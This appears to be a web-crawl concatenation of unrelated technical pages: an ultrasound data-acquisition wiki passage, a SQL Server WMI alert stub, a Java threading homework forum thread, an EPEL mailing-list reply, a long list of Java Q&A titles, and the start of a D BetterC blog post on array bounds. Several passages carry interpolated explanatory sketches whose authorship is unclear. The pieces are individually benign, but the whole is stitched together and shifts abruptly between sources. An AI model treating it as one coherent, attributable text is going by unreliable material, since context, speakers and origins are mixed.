Where <datadir> is your data acquisition directory (or a per-subject subdirectory if you prefer). When invoked with --seek, psync finds all acquisitions that need postprocessing and creates corresponding .sync.txt and .sync.TextGrid files. These files contain time-aligned pulse indexes and frame indexes in columnar and Praat textgrid formats, respectively. Here 'pulse index' refers to the synchronization pulse that is sent for every frame acquired by the SonixTablet; 'frame index' refers to the frame of image data actually received by the data acquisition workstation. Ideally these indexes would always be the same, but at high frame rates the SonixTablet cannot send data fast enough, and some frames are never received by the data acquisition machine. These missing frames are not present in the .bpr file and have 'NA' in the frame index (encoded on the 'raw_data_idx' tier) of the psync output files. For frames that are present in the .bpr you use the synchronization output files to find their corresponding times in the audio file.
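As a sketch of that lookup, here is how the columnar sync output might be turned into a frame-index-to-time map in Python. The two-column layout (time, raw_data_idx) is a simplifying assumption for illustration; check the actual .sync.txt header for the real column order:

```python
def frame_times(sync_lines):
    """Map bpr frame index -> time, from hypothetical columnar sync output.

    Missing frames are marked 'NA' in the frame-index column and are
    skipped, since they have no corresponding data in the .bpr file.
    """
    mapping = {}
    for line in sync_lines:
        t, idx = line.split()
        if idx != "NA":
            mapping[int(idx)] = float(t)
    return mapping

# Synthetic example: the third pulse was never received (NA).
lines = ["0.000 0", "0.033 1", "0.066 NA", "0.100 2"]
print(frame_times(lines))
```

The resulting dictionary answers the practical question: given a frame that does exist in the .bpr, at what time in the audio recording was it acquired.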
Separating audio channels

If you wish you can also separate the audio channels of the .wav file into .ch1.wav and .ch2.wav with the sepchan script:

python C:\Anaconda\Scripts\sepchan --seek <datadir>   # Windows environment
sepchan --seek <datadir>                              # BPM environment

This step takes a little longer than psync and is optional.

Extracting image data

You can extract image data with Python utilities. In this example we will extract an image at a particular point in time. First, load some packages:

from ultratils.pysonix.bprreader import BprReader
import audiolabel
import numpy as np

BprReader is used to read frames from a .bpr file, and audiolabel is used to read from a .sync.TextGrid synchronization textgrid that is the output from psync. Open a .bpr and a .sync.TextGrid file for reading with:

bpr = '/path/to/somefile.bpr'
tg = '/path/to/somefile.sync.TextGrid'
rdr = BprReader(bpr)
lm = audiolabel.LabelManager(from_file=tg, from_type='praat')

For convenience we create a reference to the 'raw_data_idx' textgrid label tier. This tier provides the proper time alignments for image frames as they occur in the .bpr file.

bprtier = lm.tier('raw_data_idx')

Next we attempt to extract the index label for a particular point in time. We enclose this part in a try block to handle missing frames.

timept = 0.485
data = None
try:
    bpridx = int(bprtier.label_at(timept).text)  # ValueError if label == 'NA'
    data = rdr.get_frame(int(bpridx))
except ValueError:
    print "No bpr data for time {:1.4f}.".format(timept)

Recall that some frames might be missed during acquisition and are not present in the .bpr file. These time intervals are labelled 'NA' in the 'raw_data_idx' tier, and attempting to convert this label to int results in a ValueError. What this means is that data will be None for missing image frames. If the label of our timepoint was not 'NA', then image data will be available in the form of a numpy ndarray in data.
This is a rectangular array containing a single vector for each scanline.

Transforming image data

Raw .bpr data is in rectangular format. This can be useful for analysis, but is not the norm for display purposes since it does not account for the curvature of the transducer. You can use the ultratils Converter and Probe objects to transform into the expected display. To do this, first load the libraries:

from ultratils.pysonix.scanconvert import Converter
from ultratils.pysonix.probe import Probe

Instantiate a Probe object and use it along with the header information from the .bpr file to create a Converter object:

probe = Probe(19)  # Prosonic C9-5/10
converter = Converter(rdr.header, probe)

We use the probe id number 19 to instantiate the Probe object since it corresponds to the Prosonic C9-5/10 in use in the Phonology Lab. (Probe id numbers are defined by Ultrasonix in probes.xml in their SDK, and a copy of this file is in the ultratils repository.) The Converter object calculates how to transform input image data, as defined in the .bpr header, into an output image that takes into account the transducer geometry. Use as_bmp() to perform this transformation:

bmp = converter.as_bmp(data)

Once a Converter object is instantiated it can be reused for as many images as desired, as long as the input image data is of the same shape and was acquired using the same probe geometry. All the frames in a .bpr file, for example, satisfy these conditions, and a single Converter instance can be used to transform any frame image from the file. These images illustrate the transformation of the rectangular .bpr data into a display image.

If the resulting images are not in the desired orientation you can use numpy functions to flip the data matrix:

data = np.fliplr(data)        # Flip left-right.
data = np.flipud(data)        # Flip up-down.
bmp = converter.as_bmp(data)  # Image will be flipped left-right and up-down.

In development

Additional postprocessing utilities are under development.
Most of these are in the ultratils github repository.

Troubleshooting

See the Ultrasonix troubleshooting page to correct known issues with the Ultrasonix system.
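The fliplr/flipud calls mentioned under 'Transforming image data' are plain NumPy and can be sanity-checked on a tiny array standing in for a two-scanline image:

```python
import numpy as np

# A tiny 2x3 "image": rows are scanlines, columns are samples.
data = np.array([[1, 2, 3],
                 [4, 5, 6]])

print(np.fliplr(data).tolist())  # columns reversed: [[3, 2, 1], [6, 5, 4]]
print(np.flipud(data).tolist())  # rows reversed:    [[4, 5, 6], [1, 2, 3]]
```

Because both operations return views with the same shape, the flipped array can be passed straight to converter.as_bmp() just like the original.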
http://linguistics.berkeley.edu/plab/guestwiki/index.php?title=Ultrasound_acquisition
Create a WMI Event Alert

This topic describes how to create a SQL Server Agent alert that is raised when a specific SQL Server event occurs that is monitored by the WMI Provider for Server Events in SQL Server 2017, by using SQL Server Management Studio or Transact-SQL. For information about using the WMI Provider to monitor SQL Server events, see WMI Provider for Server Events Classes and Properties.

Before You Begin

Only WMI namespaces on the computer that runs SQL Server Agent are supported.

Security

Permissions: By default, only members of the sysadmin fixed server role can execute sp_add_alert.

Using SQL Server Management Studio

Using Transact-SQL
https://docs.microsoft.com/en-us/sql/ssms/agent/create-a-wmi-event-alert?view=sql-server-2017
Hello, I have been fighting with this assignment for almost 3 weeks now and it's almost ready except for one part that I simply don't understand. I would appreciate it if someone could maybe translate it into "simple English" for me and maybe give me a little guidance.

Basically we are writing a small train track simulation program (I will include the two classes I have created later), and we are now asked to create a method that will alternate the direction of travel, presupposing that trains follow a timetable which prevents trains travelling in the same direction from colliding with each other.

Here's the question:

"The enterTrack() method should not allow a thread to proceed if:
• the direction of travel is UP, and either there is a DOWN thread currently using the track, or the number of UP threads currently on the track is already greater than two; or
• its mode is DOWN and any other threads are currently using the track.
exitTrack(TrainDirection dir) which records the fact that a thread has finished using the track and wakes up any threads that are waiting."

And my question is how do I go about referencing the threads within these methods?
Here's the code:

The Train class:

public class Train extends Thread {

    private Track track;
    private int trainId;
    private TrainDirection direction;

    public Train(TrainDirection dir, int id, Track tr) {
        direction = dir;
        trainId = id;
        track = tr;
    }

    public void run() {
        track.useTrack(direction, trainId);
    }
}

And here's the Track class I am supposed to change:

import java.util.concurrent.TimeUnit;

public class Track {

    public Track() {
    }

    public void useTrack(TrainDirection dir, int id) {
        System.out.println("Train " + id + " entering track, going " + dir);
        traverse();
        System.out.println("Train " + id + " leaving track, going " + dir);
    }

    public void enterTrack(TrainDirection dir) {
    }

    public synchronized void exitTrack(TrainDirection dir) {
    }

    /* You do not need to change this method */
    private void traverse() {
        try {
            TimeUnit.MILLISECONDS.sleep(500);
        } catch (InterruptedException ie) {
            System.out.println(ie);
        }
    }
}

Sorry for the long post :) I am not expecting a solution, as mentioned I just need to know how I am supposed to use threads directly in this method. Many thanks for your help, and sorry if I am not clear enough in my post, but Java still scares me :)
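Not a solution to the assignment itself, but the general "guarded monitor" pattern it asks for can be shown in Python's threading module, which mirrors Java's synchronized/wait()/notifyAll(). The key insight for "referencing the threads": you never reference the thread objects at all; each thread calls enter/exit itself, and the track only keeps counters of how many threads of each direction are currently inside. The class below is an illustrative sketch, not the assignment's Track:

```python
import threading

class TrackSketch:
    """Guarded monitor: UP trains share the track (up to three at once),
    a DOWN train needs the track to itself."""
    def __init__(self):
        self.cond = threading.Condition()  # plays the role of synchronized + wait/notifyAll
        self.up = 0                        # UP threads currently on the track
        self.down = 0                      # DOWN threads currently on the track

    def enter(self, direction):
        with self.cond:
            if direction == "UP":
                # Blocked while a DOWN train is inside, or more than two UP trains.
                while self.down > 0 or self.up > 2:
                    self.cond.wait()
                self.up += 1
            else:
                # DOWN: blocked while any other train is on the track.
                while self.up > 0 or self.down > 0:
                    self.cond.wait()
                self.down += 1

    def exit(self, direction):
        with self.cond:
            if direction == "UP":
                self.up -= 1
            else:
                self.down -= 1
            self.cond.notify_all()  # wake anyone waiting in enter()

track = TrackSketch()
track.enter("UP")
track.enter("UP")
print(track.up)  # -> 2 (two UP trains sharing the track)
track.exit("UP")
track.exit("UP")
```

In Java the same shape is a synchronized enterTrack with a while (...) wait(); loop and a notifyAll() in exitTrack: the wait loop re-checks the entry condition every time the thread is woken, and the counters, not the Thread objects, are the shared state.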
https://www.daniweb.com/programming/software-development/threads/192097/confused-with-threads-help-with-a-homework
On Nov 10, 2009, at 9:56 AM, Steve Traylen wrote:

> On Tue, Nov 10, 2009 at 4:51 PM, Manuel Wolfshant
> <wolfy nobugconsulting ro> wrote:
>> Farkas Levente wrote:
>>> hi,
>>> what's the proper way to distinguish epel from fedora in the spec file?
>>> i'd like to add
>>> ExcludeArch: ppc ppc64
>>> on epel but not in case of fedora in a package (since there is no java
>>> on ppc on epel). but what's the current recommended way to do so?
>>> unfortunately %{?rhel} is not defined even in rhel-5 so what else can i

Is there any problem with:

%if %{el5}
ExcludeArch: ppc ppc64
%endif

--- derks
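One note on that suggestion: a bare %if %{el5} fails to parse on systems where the macro is undefined (which is exactly the Fedora case the original poster describes), so the usual defensive spelling prefixes a literal 0 and makes the expansion optional:

```spec
# 0%{?el5} expands to "0" on Fedora (macro undefined) and to "01" on
# EL-5 (where el5 is defined as 1), so the %if is valid everywhere.
%if 0%{?el5}
ExcludeArch: ppc ppc64
%endif
```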
http://www.redhat.com/archives/epel-devel-list/2009-November/msg00027.html
Reading a xml file (April 9, 2010 at 10:48 AM)
how to read a xml file using jsp and then i have to retrive a data from that file use it in code?

java (April 9, 2010 at 10:32 AM)
Sir, My code is attached below... It shows the selected file from Jfilechooser... But we can see only a small portion... Can you help to see the full picture..... in my program
Thanks in advance
import java.io.*;
impor...

exception in thread main java.lang.unsupportedclassversionerror unsupported major.minor version 50.0 (April 9, 2010 at 9:48 AM)
Below class is compling but runtime i am getting the this error: exception in thread main java.lang.unsupportedclassversionerror unsupported major.minor version 50.0
class xxx { public static void main(String[] args) { System.out.println("Hello World!")...

Load Coursenames from MS Acess Database to JComboBox (April 9, 2010 at 8:40 AM)
Hello sir, I want to Load/add Course names which stored in Ms Acess 2007 Database, plz help me

Java source (April 9, 2010 at 12:54 AM)
Can any one help me in giving example coding to automate taking pictures using web camera, please this is urgent experts help me

core java (April 9, 2010 at 12:00 AM)
program logic for finding entered number either positive or negative?

MS-ACCESS Query Problem (April 8, 2010 at 8:13 PM)
hi sir
i have table which is initially have empty records Deleted
Attributes: Roll Name Add Age Course Class Sex Hostel
so another table is Student
Attributes: Roll Name Add Age C...

Acees data from database using combo box (April 8, 2010 at 3:09 PM)
please let me how i access the data from database when i select combo box combo2 having values Arts, Commerce, Science. this combo box will appear when first combo box class_name having value 11 or 12, otherwise combo box combo2 remain hide.
Here is JSP's files:
Here is JSP fil...
How to Add JComboBox on JPanel (April 8, 2010 at 3:07 PM)
How to Add JComboBox on JPanel
D:\java>javac ViewElements.java
ViewElements.java:181: <identifier> expected jc.addItem("France"); ^
ViewElements.java:182: <identifier> expected jc.addItem("Germany");

JComboBox on JRadioButton (April 8, 2010 at 3:02 PM)
How to add JComboBox on Jpanel, Give Me Sample Code.

java (April 8, 2010 at 2:51 PM)
Hi sir/madam
I am Remya M R, i have written code to store the image in mysql database but i have problem in retrieving the image from the mysql database and showing the same on the java panel. So please help me by giving the sample code to retrieve the image and showing in the java panel.

Java (April 8, 2010 at 12:33 PM)
sir, I attached my code... To retrive the image from database through Frame... But it show the error like this..... Couldn't find file: img.jpg
Plz help me...
import java.awt.*;
import java.awt.event.*;
imp...

Log In Form Validations (April 8, 2010 at 11:07 AM)
Good Morning Sir, I have Created Log in Form with Databse Connectivity and i have took two JTextFields 1) USERNAME 2) password. if two Jtextfields are blanks i want to show msg blank Username and Password, How I can Do That, plz Help Me Sir.

Error with JCombo Box (April 8, 2010 at 11:04 AM)
when i set JComboBox on Tab then Display Error near addItem method, that is Identifer Expected, How I Can remove that Error.

How to Store Date (April 8, 2010 at 11:01 AM)
How to Validate date in JTextField, How I can Store it in Aceess Databse, and I want to set Last Date of Admission, if Last date of admission is equal to current date then i want display Today is Last date of Admission, if Current Date is Over than Last Date then I want to Disable All Admission ...
View Questions/Answers Admission Validation April 8, 2010 at 10:54 AM Hello sir I have Designed Student Admission Form ,I want to Display Admission Status on Form that is Availbal Seats and Fillup Seats and when I FillUp 60 students in Access Databse I want to Show Status on Swing Application is that "ADMISSION FULL",How I can Show that plz Help Me Sir. ... View Questions/Answers Java April 8, 2010 at 10:14 AM sir,I make a mysql database to insert images and their features ...I attached my code to retrive the images by the given feature in the JFrameBut it cannot see the pictures in the Frame....Plz help me...p... View Questions/Answers java April 7, 2010 at 7:39 PM i just want to write program to add some n numbers it can be any 4digit or 5digir bt i nee get answer in 1 digit between 0to9 without using array using java. ... View Questions/Answers JRadio Button April 7, 2010 at 7:15 PM I have added two RadioButtons in Swing Appliction ,I want to select only one JRadioButton ,How I can Select it?plz Help Me ... View Questions/Answers Print in a long paper April 7, 2010 at 4:24 PM how to print text in long paper?? each print text, printer stops. not continue until the paper print out.Thanks ... View Questions/Answers How I Choose a folder April 7, 2010 at 3:52 PM Thanks my friend for your answer,Perhaps i do not explain clearly my question. I know how I get files from a folder. My question How I select a folder. From this selected folder i get the files.I know how I get files but the problem How I choose a fold... View Questions/Answers java April 7, 2010 at 3:28 PM Hai....Sir.........My java code is Pasted below....In this code I want to show the selected file in the panel....And Also I cannot insert values into database.........But there is ... View Questions/Answers java April 7, 2010 at 3:17 PM Is there any available system for cbir (CONTENT BASED IMAGE RETRIVAL)in java ... 
View Questions/Answers Importing in eclipse April 7, 2010 at 2:53 PM I'm using eclipse for designing struts application...I'm manually copying the tld files and creating struts-config.xml file for my project...Is there the best way to import the tld filesor to add the struts capabilities automatically in eclipse..?? ... View Questions/Answers how i conditional access the data from database using combo box. April 7, 2010 at 2:21 PM i have combox box named class when i select its value 11 or 12, another combo box appears named Subject values Arts, Commerce, Science.how i conditional access the data from database when i select class 11 0r 12.Here is JSP file:-display.jsp:<html>... View Questions/Answers File Upload in J2ee on solaris machine using sftp April 7, 2010 at 1:01 PM Hi,Currently we are using FTP to upload the file from our J2EE web application. This is working perfectly fine. we are using below command to do so.;type=iNow we have to change the application in such a way ... View Questions/Answers java April 7, 2010 at 12:18 PM how to a selected image set a background image in textarea ... View Questions/Answers swings April 7, 2010 at 12:00 PM hi I am using netbeans ide , while i am trying to debug my project it is giving me an error like this Have no FileObject for C:\Program Files\Java\jdk1.6.0_14\jre\lib\sunrsasign.jarHave no FileObject for C:\Program Files\Java\jdk1.6.0_14\jre\classeswh... View Questions/Answers Please develop code April 7, 2010 at 11:58 AM i want to develop a program that search a file in a directory and its subdirectories and rename that file with name of main directory ... View Questions/Answers java collections April 7, 2010 at 10:55 AM i need a sample quiz program by using collections and its property reply soon as possible .... ... View Questions/Answers Javascript code April 7, 2010 at 10:42 AM Hi, This is ragavendran.. I have a simple doubt in my project.. 
There is a page in which there is a table with each row ending with a hyperlink called "View Image".. Once i click that link, the particular row should be color changed.. In the second phase, if i click another li... View Questions/Answers java April 7, 2010 at 10:36 AM java code for retrive images from mysql database through jFrame ... View Questions/Answers JDBC April 7, 2010 at 9:39 AM What is mean JDBC ANY E BOOK ... View Questions/Answers java beginners April 7, 2010 at 8:08 AM pl. let me know how to exterat the decimal numbers from a number i want a java program for it Example if input 12.453OUTPUT 12 .453 if input 25.7657 OUTPUT 25 .7657 ... View Questions/Answers Java Aplications April 6, 2010 at 6:06 PM Someone please help me write this Java programsi) Imagine you need to open a standard combination dial lock but don't know the combination and don't have a pair of bolt cutters. Write a Java program that prints all possible combinations so you can print them on a piece of paper and check off e... View Questions/Answers Java Dialogs April 6, 2010 at 4:27 PM a) I wish to design a frame whose layout mimics the Firefox print dialog . (please you can go to Mozilla Firefox, click File, then Print- to see the diagram)None of the components actually have to do anything. It should just show me how to lay out components.b) I wish to write an ... View Questions/Answers jsp April 6, 2010 at 4:09 PM how can i write a java script inside a jsp.i have a form in jsp and i want to do some client side validations on it. ... View Questions/Answers JDBC April 6, 2010 at 3:06 PM How to connect to mysql database from an applets or GUI components (on J2SE) using Eclipse ? ... View Questions/Answers java log4j April 6, 2010 at 1:40 PM which is the best site to prepare log4j in java since i am new to it ... 
View Questions/Answers Jav Applets April 6, 2010 at 1:36 PM I need to write a small payroll program, using applet, that provides a text field for the number of hours, a text field for the pay rate, and a non-editable text field for the output. It should also also provide labels to identify all three text fields and a button to calculate the result. ... View Questions/Answers java code April 6, 2010 at 1:33 PM Imagine you need to open a standard combination dial lock but don't know the combination and don't have a pair of bolt cutters. I need to write a Java program that prints all possible combinations so you can print them on a piece of paper and check off each one as you try it. Assume the numbers on t... View Questions/Answers java April 6, 2010 at 12:14 PM java code for retrive an image from mysyl database through jFrame ... View Questions/Answers ascending or descending order in jsp using servlet April 6, 2010 at 11:54 AM My Problem is that how to sort any column in ascending or descending order,with following requirements1. A single click on the header of a certain column causes the table to re-sort based on this column.2. A repeated click on the same column changes the sort dire... View Questions/Answers java April 6, 2010 at 10:56 AM i wanna know about jgapwhat is it?why and how to use it in genetic algorithms?plzzzzzzz help me out as u r the most accurate source i had ... View Questions/Answers Jtable Question April 6, 2010 at 10:32 AM Hello Sir,I have Created Database in MS access 2007 ,I want show the table data in toSwing JTable, How I can Show it,plz Help Me Sir. ... View Questions/Answers Java singleton program April 6, 2010 at 8:35 AM Hi All,Can you please explain me in brife with an example how the singleton program works, i did see some documents but was not able to unerstand except one object can be used.this was a java interview question in Perot systems. ... 
View Questions/Answers Swimming Pool Calculator April 5, 2010 at 10:43 PM Okay, so I tried making the program with this coding:import java.awt.*;import javax.swing.*;import java.awt.event.*;import java.util.*;import java.io.*;import java.text.SimpleDateFormat;public class SwimmCalc extends JFrame implements Actio... View Questions/Answers Index.java April 5, 2010 at 10:14 PM I need to write a Java GUI application called Index.java that inputs several lines of text and a search character and uses String method indexOf to determine the number of occurrences of the character in the text. ... View Questions/Answers Swimming Pool Calculator April 5, 2010 at 10:11 PM I have to write a program to calculate the volume of a swimming pool. The assignment is as follows:This Swimming Pool Calculator is one that is very simple to use. As you can see, it is a user interface that will allow the user to enter the desired length, width, and average depth of a ... View Questions/Answers java April 5, 2010 at 8:24 PM sir please helpme as i need this to complete my module . q1)How to add Month in a Current Date , i am using simple Date Format in swing . ex: if Current Date is 5/4/2010 then it should displayed as 5/5/2010 q2)I have two table namely F... View Questions/Answers Login form using Jsp in hibernate April 5, 2010 at 6:24 PM Hai Friend,As I new and entering into... View Questions/Answers How to call jasper from jsp or servlet April 5, 2010 at 5:54 PM Hi Expert ,I created jasper report using ireport.how to call that jasper with jsp file or servlet file ?Thanks in advanceEswaramoorthy.s ... View Questions/Answers How To Display MS Access Table into Swing JTable April 5, 2010 at 1:10 PM How to Display Records From MS Access Database To JTable.Plz Help Me ... 
View Questions/Answers Ascending or descending order April 5, 2010 at 12:00 PM I have a table by name employee,attributes are emiid,fstname,lastname,address,emailid and soon..I have to create a 2 fields in a column empid,fstname,lastname1 for asc and another for desc order for each column.if i click on a asc in empid column the empid should be order in asc order an... View Questions/Answers values of Combo boxes are not stored in database April 5, 2010 at 11:28 AM i have some combo box values.when i click the submit button after select combo box values, the values are not going in database.please review the code:<%if((school.equals("indus"))||(school.equals("dps"))||(school.equals("mdn")))... View Questions/Answers exception in thread main java.lang.unsupportedclassversionerror unsupported major.minor version 50.0 April 5, 2010 at 11:12 AM I am getting the below error when the class now.java -version java version "1.4.2_06" javac -version java version "1.6.0_10" ... View Questions/Answers INSERT CAPTCHA April 5, 2010 at 10:05 AM HI ALLWISH U A GREAT DAY . I HAVE TO INSERT IMAGE CAPTCHA IN MY FORM . WHEN THE USER HAS GIVEN CORRECT INPUT , HE HAS TO GO TO SUCCESS PAGE WHEN CLICKING ON THE SUBMIT BUTTON .ANY JSCRIPT IDEAS ?THANKS IN ADVANCEES... View Questions/Answers validation of date,phone number,email April 4, 2010 at 5:43 PM Sir how to validate date,phone number and email in java swings ... View Questions/Answers date picker componnt April 4, 2010 at 5:41 PM sir i need code for date picker in java swing for my project sir please send me sir ... View Questions/Answers java April 4, 2010 at 3:35 PM Dear,Please I hope you help me. I want to select all files that ends with txt ( txt files) using Filechooser from a directory that I choose. Can you help me.With my best regards ... View Questions/Answers error occured in oracle April 4, 2010 at 12:13 PM hi... 
this is the error i got in oracle 11g when i am trying to insert image ORA-00984:column not allowedd here for the insert statement like this insert into imgapp('1','xxx','G:\image folder\ultrasound image\02us12a.jpg") ... View Questions/Answers oracle insert statement error April 4, 2010 at 9:55 AM hi.. please help me to insert a image into oracle 11g database and please say me how can i insert image from directory like G:\imagefolder\ultrasoundimage\02us02.jpeg please help me ... View Questions/Answers html April 4, 2010 at 12:45 AM 7) Create an HTML page containing the following featuresa. A combo box containing the list of 7 colors: Violet, Indigo, Blue, Green, Yellow, Orange, Redb. Depending upon the color selected from the above combo box, the message in the status bar of the window must be reflect the va... View Questions/Answers html April 4, 2010 at 12:43 AM 3) Create a HTML page to display a list of film songs available in the library. The following are features of the pagea. The name of the songs must be hyper linked to the songs, so that the users must be able to download songs.b. The following is the song database available in the librar... View Questions/Answers java April 3, 2010 at 12:46 PM Servlet Question April 2, 2010 at 11:39 PM I want to call one servlet when the browser window is closed by User. ... View Questions/Answers Servlet Question April 2, 2010 at 11:39 PM I want to call one servlet when the browser window is closed by User. ... View Questions/Answers storing details in database on clicking submit button April 2, 2010 at 7:58 PM I am using JSP in NetBeans and have developed an application form which has fileds naming 'Name' and 'ID'.I want to store the details of these two fields in the MYSQL database on clicking submit button. I am unable to do this.Can u tell me how to code this page and where and should be my code writte... 
View Questions/Answers Problem with Java Source Code April 2, 2010 at 4:12 PM Dear Sir I have Following Source Code ,But There is Problem with classes,plz Help Me.package mes.gui;import javax.swing.JOptionPane.*;import java.sql.*;import javax.swing.*;import javax.swing.border.*;import java.awt.*;import java.awt.event... View Questions/Answers blank space in input field April 2, 2010 at 3:43 PM I retrieved the fields from my mysql table...If the field contains null value i want to display a blank space in input field(text box)..but i am displaying null how to overcome this..u r help is highly appreciated. ... View Questions/Answers Re: base the value of first combo box, how i display the second combox April 2, 2010 at 1:12 PM Dear Sir,in this program when i click on submit button, the corrosponding value of combo box should be sent. but when i clicked to submit button, it do nothing.please review this code:<%if((school.equals("indus"))||(school.equals("dps"))||(s... View Questions/Answers How to change backgroundcolor and foreground color of JLabel in Java April 2, 2010 at 10:42 AM How to change backgroundcolor and foreground color of JLabel in Java ... View Questions/Answers javascript code April 2, 2010 at 4:31 AM Hi,thanks for ur slideshow coding which is very user interactive and attractive.but in this we r explicitely specifying each image file name one by one. Can we make it in a while loop which will read all the files in a image folder and display it. Kindly clarify my doubt. ... View Questions/Answers conversion April 1, 2010 at 7:54 PM how to convertor .xl to .pdf and .pdf to .xl and .mp4 to .mp3 ... View Questions/Answers Connecting JTable to database April 1, 2010 at 7:28 PM m... 
View Questions/Answers how to link differnt modules April 1, 2010 at 7:11 PM i am doing my final year project which is based on steganography.we hide the secret msg in the spaces between the words and paragraphs.we have around 4 modules.all the modules are running fine individually.the prob is how can i link all the 4 modules so that they work in a step by step manner.... View Questions/Answers Struts April 1, 2010 at 6:59 PM Hi, I am doing a reverse engineering in a project based on struts 1.1,after seeing the log file, i encounter some lines that are written by applicatoin, following are the lines in log related to strtus while actionservelt is doing his task.****************************o... View Questions/Answers Wireless communication April 1, 2010 at 6:33 PM I want to send and receive data(message/data) between 2 lappys which are connected in wireless lan. can u plz expalin how to start the JAVA source code?? ... View Questions/Answers Remote Location Handeling April 1, 2010 at 5:32 PM I have application where I want main control from one location and have to connect two more locations remotly and have to handle it.So what should I use in my application Server/RMI or web application?Also help me to connect me to the remote locations having main control with my location ... View Questions/Answers Re: base the value of first combo box, how i display the second combox April 1, 2010 at 3:55 PM thanks for your reply.i want to know suppose the second combo box appear only when i select the class 11th or 12th.please review.your answer:<html><h2>ComboBox</h2><script language="javascript">... View Questions/Answers datagrid search April 1, 2010 at 3:11 PM Hi friend, i have displayed a datagrid using jsp but i need a search option in that which is used to display and sort it in a alphabetical order....pls help me...Thanks in advance... ... 
View Questions/Answers Retrieve Value from Table April 1, 2010 at 3:05 PM Hai friend,I need help, How can i retrieve values From database using hibernate in web Application. As I new to hibernate I couldn't find solution for this problem.. Can anyone help please.. ... View Questions/Answers Html / Java Script April 1, 2010 at 2:15 PM Hi There,in my form there are ten text boxes. my requirement is that when i click checkbox,the values of first five textbox has to copy to next five. I need jscript for that ... View Questions/Answers base the value of first combo box, how i display the second combox April 1, 2010 at 1:25 PM i have a combo box for classes. my requirement is when i select the class, if class is 11 or 12 the second combo box of subject should be appear.please let me how i implement this in JSP.<%! int i=1; %><tr><td>Class</td><td><selec... View Questions/Answers java Exception handling April 1, 2010 at 12:44 PM what is the difference between throw and throws keywords ... View Questions/Answers java Exception handling April 1, 2010 at 12:42 PM what is the difference between throw and throws keywords ... View Questions/Answers Paging or pagination April 1, 2010 at 10:34 AM 1.how to do paging or pagination in jsp using servlets?I have a 20 records ,i have to show them in 2 pages like pages 1 2...i done this but i m geting starting 10 records correctly but i m unable to get a next 10 records it is showing a starting 10 records only please help me... View Questions/Answers jsp March 31, 2010 at 11:35 PM How to creat table in jsp which show single containt tha is employee nameWhen u enter the employee name and submit.then another box will display which show the every detail of the employee of the same name from data base if of employee dose not existing in same name then another box will disp... 
View Questions/Answers Encryption In Swing March 31, 2010 at 9:43 PM Hi sir i have a JFrame Containing User Name and Password is there any way to encrypt password and how can we store the encrypted passwaord to MS ACCESS ... View Questions/Answers javascript code March 31, 2010 at 9:00 PM hi,i want to display all the image files in a folder one by one like a slidshow on my website using javascript. Will you please help me for this??? ... View Questions/Answers SWING March 31, 2010 at 7:48 PM how to insert image and components such as JLabel,JButton,JTextfield in JFrame in swing? ... View Questions/Answers enable users to enter names March 31, 2010 at 6:51 PM this is the code for tic tac toe game, i want users can save their name as player X and player O, but I do not know how? can you give me some tips?package threeTsGame;import java.awt.*;import java.awt.event.*;import javax.swing.*;publ... View Questions/Answers core Java March 31, 2010 at 6:04 PM how is it possible to create object before calling main() in Java? ... View Questions/Answers Keep servlet session alive March 31, 2010 at 3:40 PM Hi,I am developing an application in java swing and servlet. Database is kept on server. I am using HttpClient for swing servlet communication.I want to send heartbeat message from client to server after every specific time interval so that servlet will not invalidate session... View Questions/Answers exporting data to excel sheet March 31, 2010 at 3:25 PM Sir i have already send request about this problem sir.Sir i want code for below applicationSir whenever execute query in java swing program,i want to print the result about the query in excel sheet.Sir plz help me sir. ... View Questions/Answers java March 31, 2010 at 3:06 PM siri server-jsp March 31, 2010 at 2:01 PM how can we implement a simple database(ms access) for storing information about the HTTP requests sent to a web server(database)? ... 
View Questions/Answers EJB JNDI LOOK UP PROBLEM March 31, 2010 at 12:53 PM Hi, I am using jboss4.2 and created a sessionbean<stateless> using EJB3 but while running client code I am finding NoInitialContextException claname not set in enviornment properties... Thankx. ... View Questions/Answers java March 31, 2010 at 12:28 PM just by removing the package name???? ... View Questions/Answers swings March 31, 2010 at 12:27 PM hi i want to fill a polygon with a pattern. for this i am trying to use the HSSFCellStyle.FINE_DOTS, but it gives a error like cannot find the variable HSSFCellStyle.how can i use the all hsscfill patterns give me a small example for this.......... ... View Questions/Answers
This post is the second in a series about D’s BetterC mode.

Do you ever get tired of bugs that are easy to make, hard to check for, often don’t show up in testing, and blast your kingdom once they are widely deployed? They cost you time and money again and again. If you were only a better programmer, these things wouldn’t happen, right?

Maybe it’s not you at all. I’ll show how these bugs are not your fault – they’re the tools’ fault, and by improving the tools you’ll never have your kingdom blasted by them again. And you won’t have to compromise, either.

## Array Overflow

Consider this conventional program to calculate the sum of an array:

```c
#include <stdio.h>

#define MAX 10

int sumArray(int* p) {
    int sum = 0;
    int i;
    for (i = 0; i <= MAX; ++i)
        sum += p[i];
    return sum;
}

int main() {
    static int values[MAX] = { 7,10,58,62,93,100,8,17,77,17 };
    printf("sum = %d\n", sumArray(values));
    return 0;
}
```

The program should print:

```
sum = 449
```

And indeed it does, on my Ubuntu Linux system, with both gcc and clang and `-Wall`. I’m sure you already know what the bug is:

```c
for (i = 0; i <= MAX; ++i)
              ^^
```

This is the classic “fencepost problem”. It goes through the loop 11 times instead of 10. It should properly be:

```c
for (i = 0; i < MAX; ++i)
```

Note that even with the bug, the program still produced the correct result! On my system, anyway. So I wouldn’t have detected it. On the customer’s system, well, then it mysteriously fails, and I have a remote heisenbug. I’m already tensing up anticipating the time and money this is going to cost me.

It’s such a rotten bug that over the years I have reprogrammed my brain to:

- Never, ever use “inclusive” upper bounds.
- Never, ever use `<=` in a for loop condition.

By making myself a better programmer, I have solved the problem! Or have I? Not really. Let’s look again at the code from the perspective of the poor schlub who has to review it. He wants to ensure that `sumArray()` is correct.
He must:

- Look at all callers of `sumArray()` to see what kind of pointer is being passed.
- Verify that the pointer actually is pointing to an array.
- Verify that the size of the array is indeed `MAX`.

While this is trivial for the trivial program as presented here, it doesn’t really scale as the program complexity goes up. The more callers there are of `sumArray`, and the more indirect the data structures being passed to `sumArray`, the harder it is to do what amounts to data flow analysis in your head to ensure it is correct. Even if you get it right, are you sure? What about when someone else checks in a change, is it still right? Do you want to do that analysis again? I’m sure you have better things to do. This is a tooling problem.

The fundamental issue with this particular problem is that a C array decays to a pointer when it’s an argument to a function, even if the function parameter is declared to be an array. There’s just no escaping it. There’s no detecting it, either. (At least gcc and clang don’t detect it; maybe someone has developed an analyzer that does.)

And so the tool to fix it is D as a BetterC compiler. D has the notion of a dynamic array, which is simply a fat pointer, that is laid out like:

```d
struct DynamicArray {
    T* ptr;
    size_t length;
}
```

It’s declared like:

```d
int[] a;
```

